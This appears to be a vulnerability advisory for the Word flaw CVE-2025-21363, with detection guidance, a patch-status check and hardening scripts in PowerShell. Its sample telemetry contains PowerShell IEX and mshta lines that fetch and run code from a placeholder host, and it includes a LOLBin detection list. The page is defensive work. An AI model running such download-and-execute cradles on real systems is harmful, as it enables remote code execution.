CVE-2025-21363 Overview
CVE-2025-21363 is a remote code execution vulnerability in Microsoft Word that Microsoft addressed in its January 2025 security update. It affects Microsoft 365 Apps for Enterprise and Microsoft Office Long Term Servicing Channel (LTSC) 2021 and 2024. Microsoft assigned a CVSS 3.1 base score of 7.8 (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) and classified the flaw under CWE-822: Untrusted Pointer Dereference. Although Microsoft titles the issue "remote code execution", the CVSS attack vector is Local and user interaction is required: the attacker must get a target to open a malicious document. Successful exploitation yields code execution in the security context of the user who opened the file, with high impact to confidentiality, integrity, and availability.
Critical Impact
An attacker who convinces a user to open a crafted Office document can execute arbitrary code in that user's security context. The vector grants no privilege escalation by itself, but code running as the user is enough for persistence, lateral movement with the user's credentials, and data theft.
Affected Products
- Microsoft 365 Apps for Enterprise (x64 and x86)
- Microsoft Office LTSC 2021 for macOS
- Microsoft Office LTSC 2024 (x64, x86, and macOS)
Discovery Timeline
- 2025-01-14 - CVE-2025-21363 published to the National Vulnerability Database (NVD)
- 2025-01-14 - Microsoft published security advisory for CVE-2025-21363
- 2025-07-01 - Last updated in NVD database
Technical Details for CVE-2025-21363
Vulnerability Analysis
The vulnerability resides in how Microsoft Word parses document content. Microsoft's advisory classifies it under CWE-822: Untrusted Pointer Dereference and publishes no further technical detail. By the CWE definition, Word takes a pointer-like value from attacker-controlled document data and dereferences it without sufficient validation; what the resulting out-of-bounds read or write achieves depends on what the attacker can place at the forged address, and memory corruption of this kind is typically leveraged into control of execution flow.
The CVSS attack vector is Local and user interaction is required: the targeted user must open the file. Microsoft's advisory states that the Preview Pane is not an attack vector, so previewing a message in Outlook does not trigger the flaw. Code runs with the privileges of the account that opened the document; a standard user account limits the blast radius, whereas a user with administrative rights hands the attacker full control of the host.
Root Cause
Microsoft has not published a root-cause analysis. The CWE-822 classification indicates that Word trusts a memory reference derived from document object fields and follows it without bounds or type checking, so a document that places a forged pointer into the parsed structure can make Word read or write at an attacker-controlled address.
Attack Vector
Delivery would typically occur through phishing, watering-hole sites, or shared file repositories: the attacker delivers a crafted Word document and waits for the victim to open it in a vulnerable installation, at which point the parser performs the untrusted pointer dereference. No verified public proof-of-concept exists at the time of writing, Microsoft's advisory does not list the specific file formats involved, and the vulnerability is not in the CISA Known Exploited Vulnerabilities catalog. Refer to the Microsoft Security Response Center advisory for vendor technical details.
Detection Methods for CVE-2025-21363
Indicators of Compromise
- Unexpected child processes spawned by winword.exe, such as cmd.exe, powershell.exe, rundll32.exe, or mshta.exe.
- Office documents arriving via email or external file shares that trigger crashes or anomalous memory access in Word.
- Outbound network connections from winword.exe to untrusted hosts shortly after document open.
- Creation of executables, scripts, or scheduled tasks in user-writable paths following document interaction.
Detection Strategies
- Hunt for process lineage where winword.exe is the parent of a scripting or LOLBin process.
- Inspect Office telemetry and Microsoft Defender logs (including Application Guard for Office, where it is still deployed) for blocked or anomalous document behavior.
- Correlate email gateway attachment metadata with endpoint document-open events to identify suspicious delivery patterns.
Monitoring Recommendations
- Enable and forward Office client telemetry and Defender for Office 365 Safe Attachments detonation results.
- Collect Sysmon Event ID 1 (Process Create), Event ID 3 (Network Connect), and Event ID 11 (File Create) for Office binaries.
- Monitor for Word crashes via Windows Error Reporting that may indicate exploitation attempts.
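The process-lineage hunt and the Sysmon Event ID 1 collection above, as an added PowerShell example that is not part of the Microsoft advisory or of this page's original content. The sample records at the bottom are constructed, not real telemetry; on a host with Sysmon installed, Get-SysmonProcessCreate feeds the same matching function from the live log. The child-process list, field names and paths are assumptions for the example.

```powershell
# Added example: hunt Sysmon Event ID 1 (Process Create) records for
# winword.exe spawning scripting hosts or LOLBins.

$SuspiciousChildren = @(
    'cmd.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe',
    'mshta.exe', 'rundll32.exe', 'regsvr32.exe', 'certutil.exe',
    'bitsadmin.exe', 'msiexec.exe', 'curl.exe'
)

function Get-SysmonProcessCreate {
    # Read Event ID 1 from the live Sysmon log and flatten EventData into
    # objects with the same fields as the constructed sample below.
    param([int] $MaxEvents = 5000)
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction Stop |
        ForEach-Object {
            $data = @{}
            foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            [pscustomobject]@{
                UtcTime     = $data['UtcTime']
                User        = $data['User']
                ParentImage = $data['ParentImage']
                Image       = $data['Image']
                CommandLine = $data['CommandLine']
            }
        }
}

function Find-WordChildProcesses {
    # Emit one record per Process Create event whose parent is winword.exe and
    # whose image is in $SuspiciousChildren. Only the file name is compared, so
    # the Office install path does not matter.
    param([Parameter(Mandatory)] [AllowEmptyCollection()] [object[]] $Events)
    foreach ($e in $Events) {
        $parent = [IO.Path]::GetFileName([string]$e.ParentImage)
        $child  = [IO.Path]::GetFileName([string]$e.Image)
        if ($parent -ieq 'winword.exe' -and $SuspiciousChildren -contains $child) {
            [pscustomobject]@{
                UtcTime     = $e.UtcTime
                User        = $e.User
                Child       = $child
                CommandLine = $e.CommandLine
            }
        }
    }
}

# Constructed sample (not real telemetry): Word started by Explorer (benign),
# Word spawning the print helper (benign), and Word spawning cmd.exe and
# mshta.exe (suspicious). 192.0.2.10 is a documentation-range address.
$office = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
$Sample = @(
    [pscustomobject]@{ UtcTime = '2025-01-15 09:02:11.120'; User = 'CORP\alice'
                       ParentImage = 'C:\Windows\explorer.exe'; Image = $office
                       CommandLine = "`"$office`" /n `"C:\Users\alice\Downloads\invoice.docx`"" }
    [pscustomobject]@{ UtcTime = '2025-01-15 09:02:13.004'; User = 'CORP\alice'
                       ParentImage = $office; Image = 'C:\Windows\splwow64.exe'
                       CommandLine = 'C:\Windows\splwow64.exe 12288' }
    [pscustomobject]@{ UtcTime = '2025-01-15 09:02:14.870'; User = 'CORP\alice'
                       ParentImage = $office; Image = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'cmd.exe /c powershell -nop -w hidden -c "IEX((New-Object Net.WebClient).DownloadString(''http://192.0.2.10/a''))"' }
    [pscustomobject]@{ UtcTime = '2025-01-15 09:02:15.211'; User = 'CORP\alice'
                       ParentImage = $office; Image = 'C:\Windows\System32\mshta.exe'
                       CommandLine = 'mshta.exe http://192.0.2.10/b.hta' }
)

# Offline run over the constructed sample: returns the cmd.exe and mshta.exe rows only.
Find-WordChildProcesses -Events $Sample | Format-Table -AutoSize

# Live hunt on a Sysmon host:
# Find-WordChildProcesses -Events (Get-SysmonProcessCreate)
```

Matching on the child file name alone keeps the rule simple but will also fire on legitimate Word add-ins that shell out; review the command lines before escalating, and extend the match to Sysmon Event ID 3 when you want to pair a suspicious child with the outbound connection it makes.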
How to Mitigate CVE-2025-21363
Immediate Actions Required
- Apply the security update referenced in the Microsoft CVE-2025-21363 advisory across all Microsoft 365 Apps and Office LTSC installations.
- Verify update channels for Microsoft 365 Apps are set to receive current builds and confirm deployment status using Microsoft 365 Apps admin center.
- Until patching completes, quarantine or detonate Office attachments from untrusted senders at the email gateway rather than delivering them directly.
Patch Information
Microsoft released the fix in the January 2025 Patch Tuesday cycle (2025-01-14). Microsoft 365 Apps and Office LTSC 2021 and 2024 on Windows are Click-to-Run installations that receive the fix as new channel builds, so consult the Microsoft Security Response Center advisory for CVE-2025-21363 for the fixed build number (and KB identifier, where one is published) of each channel and platform. Office LTSC for Mac requires its own update.
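A way to confirm deployment status from the endpoint side, as an added PowerShell example that is not Microsoft's or this page's own code. It reads the Click-to-Run configuration key that every Office 2016+ Click-to-Run install writes and compares the installed build with a minimum fixed build. The fixed build is deliberately not asserted here: take it from the MSRC advisory for the channel in question (each update channel has its own build number) and pass it in. The host names in the usage lines are placeholders, remote queries need the Remote Registry service, and macOS installs are not covered.

```powershell
# Added example: report Office Click-to-Run build, platform and channel and
# compare the build with the minimum fixed build from the MSRC advisory.

function Get-OfficeC2RPatchStatus {
    param(
        [Parameter(Mandatory)] [version] $MinimumFixedBuild,   # value comes from the MSRC advisory
        [string] $ComputerName = $env:COMPUTERNAME
    )
    try {
        # Remote hosts need the Remote Registry service running and admin rights.
        $hklm = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', $ComputerName)
        $cfg  = $hklm.OpenSubKey('SOFTWARE\Microsoft\Office\ClickToRun\Configuration')
    } catch {
        return [pscustomobject]@{ Computer = $ComputerName; Status = "Error: $($_.Exception.Message)" }
    }
    if (-not $cfg) {
        return [pscustomobject]@{ Computer = $ComputerName; Status = 'No Click-to-Run Office found' }
    }

    $build  = [version]$cfg.GetValue('VersionToReport')
    $status = if ($build -ge $MinimumFixedBuild) { 'Patched' } else { 'VULNERABLE' }
    [pscustomobject]@{
        Computer = $ComputerName
        Build    = $build
        Platform = $cfg.GetValue('Platform')            # x86 or x64
        Products = $cfg.GetValue('ProductReleaseIds')   # e.g. O365ProPlusRetail
        Channel  = $cfg.GetValue('UpdateChannel')       # CDN URL; its GUID identifies the channel
        Status   = $status
    }
}

# Usage (placeholders; substitute the build Microsoft lists for your channel
# and your own host names). Run once per update channel, since the fixed
# build differs between channels.
# $fixed = [version]'16.0.<build from advisory>'
# 'host1', 'host2' | ForEach-Object { Get-OfficeC2RPatchStatus -ComputerName $_ -MinimumFixedBuild $fixed }
```

Because the comparison is a plain [version] compare, a host that sits on a different channel than the one you took the threshold from will be misclassified; group hosts by the Channel column before judging the Status column.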
Workarounds
- Enable Protected View for files from the internet, email attachments, and unsafe locations. Application Guard for Office provided stronger isolation for such documents but has been deprecated by Microsoft, so do not build new controls on it.
- Configure Attack Surface Reduction (ASR) rules to block Office applications from creating child processes and from injecting code into other processes.
- Restrict macro execution and disable legacy file format support (File Block settings) where business requirements permit. Because CWE-822 describes a parsing flaw rather than macro abuse, macro restrictions do not prevent exploitation; they only reduce the attacker's follow-on options.
# Example: enable the "Block all Office applications from creating child processes" ASR rule.
# Requires an elevated PowerShell session and Microsoft Defender Antivirus as the active engine.
# Use -AttackSurfaceReductionRules_Actions AuditMode first to measure business impact.
Add-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A `
    -AttackSurfaceReductionRules_Actions Enabled
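The workarounds above carried through as one PowerShell example, added here and not Microsoft's or this page's own code. It stages the Office-related ASR rules in audit mode (or enforces them), reads the resulting state back from Defender, and turns on Word Protected View for internet, attachment and unsafe-location files through the policy registry key that the Office Group Policy templates write. The rule GUIDs are Microsoft's documented identifiers; the function names and the choice of rules are assumptions for the example. It requires an elevated session and Microsoft Defender Antivirus as the active antimalware engine.

```powershell
# Added example: stage Office ASR rules, verify them, and enforce Protected View.

$OfficeAsrRules = [ordered]@{
    'D4F940AB-401B-4EFC-AADC-AD5F3C50688A' = 'Block all Office applications from creating child processes'
    '75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84' = 'Block Office applications from injecting code into other processes'
    '3B576869-A4EC-4529-8536-B80A7769E899' = 'Block Office applications from creating executable content'
    '92E97FA1-5D66-4CE8-B60E-D3A02F23DDD8' = 'Block Win32 API calls from Office macros'
}

function Set-OfficeAsrRules {
    # Start with AuditMode, review Event IDs 1121 (block) and 1122 (audit) in
    # the Microsoft-Windows-Windows Defender/Operational log, then rerun with
    # -Action Enabled once line-of-business breakage has been ruled out.
    param([ValidateSet('AuditMode', 'Enabled', 'Warn', 'Disabled')] [string] $Action = 'AuditMode')
    foreach ($id in $OfficeAsrRules.Keys) {
        # Add-MpPreference adds or updates one rule without touching the others.
        Add-MpPreference -AttackSurfaceReductionRules_Ids $id -AttackSurfaceReductionRules_Actions $Action
    }
}

function Get-OfficeAsrRuleState {
    # Defender stores rule IDs and actions as two parallel arrays.
    $pref    = Get-MpPreference
    $ids     = @($pref.AttackSurfaceReductionRules_Ids | ForEach-Object { $_.ToUpper() })
    $actions = @($pref.AttackSurfaceReductionRules_Actions)
    $names   = @{ 0 = 'Disabled'; 1 = 'Block'; 2 = 'Audit'; 6 = 'Warn' }
    foreach ($id in $OfficeAsrRules.Keys) {
        $i     = [array]::IndexOf($ids, $id.ToUpper())
        $state = if ($i -ge 0) { $names[[int]$actions[$i]] } else { 'NotConfigured' }
        [pscustomobject]@{ Rule = $OfficeAsrRules[$id]; Id = $id; State = $state }
    }
}

function Enable-WordProtectedView {
    # Policy key: overrides whatever the user chose in Trust Center. A value of
    # 0 means "do not disable", i.e. Protected View is on for that source.
    $key = 'HKCU:\Software\Policies\Microsoft\Office\16.0\Word\Security\ProtectedView'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    foreach ($name in 'DisableInternetFilesInPV', 'DisableAttachmentsInPV', 'DisableUnsafeLocationsInPV') {
        Set-ItemProperty -Path $key -Name $name -Value 0 -Type DWord
    }
    Get-ItemProperty -Path $key |
        Select-Object DisableInternetFilesInPV, DisableAttachmentsInPV, DisableUnsafeLocationsInPV
}

Set-OfficeAsrRules -Action AuditMode
Get-OfficeAsrRuleState | Format-Table -AutoSize
Enable-WordProtectedView
```

The Protected View function writes the current user's policy hive only; at scale push the same three values through Group Policy or Intune, and apply the ASR rules through Intune or GPO so that a local Set-MpPreference on one host cannot silently undo them.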
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.